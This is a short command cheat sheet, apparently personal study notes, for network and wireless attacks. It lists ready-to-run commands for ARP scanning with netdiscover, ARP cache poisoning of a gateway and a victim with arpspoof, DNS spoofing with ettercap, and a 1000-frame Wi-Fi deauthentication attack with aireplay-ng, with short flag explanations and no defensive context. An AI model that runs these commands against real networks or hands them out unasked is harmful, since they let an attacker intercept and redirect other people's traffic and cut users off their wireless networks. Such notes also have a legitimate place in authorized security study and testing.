network security:
show ips:
	#ifconfig

scan network with ARP scan:
	#netdiscover    -- active mode
	#netdiscover -p -- passive mode

ARP spoof:
	#arpspoof -t <Gateway IP address> <victim IP address>  -- poisoning gateway's arp cache
	#arpspoof -t <Victim IP address> <Gateway IP address>  -- poisoning victim's arp cache

to view arp cache in your machine:
	#arp -a

DNS spoof:
	use arp spoof the commands below
	#ettercap -Tq -P dns_spoof

------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------

Wireless attacks:

list you wireless interfaces:
	#iwconfig

put your wireless card in the monitor mode:
	#airmon-ng start <wireless card>

view the APs and clinets connected to them
	#airodump-ng <wirelss card>

deauthentications attacks on clinets:
	#aireplay-ng -0 1000 -a <APs MAC address> -c <clients MAC address> <wireless card>
	>> -0 attack mode
	>> 1000 number of deauthentication frames 
	>> -a APs MAC address
	>> -c clients MAC address
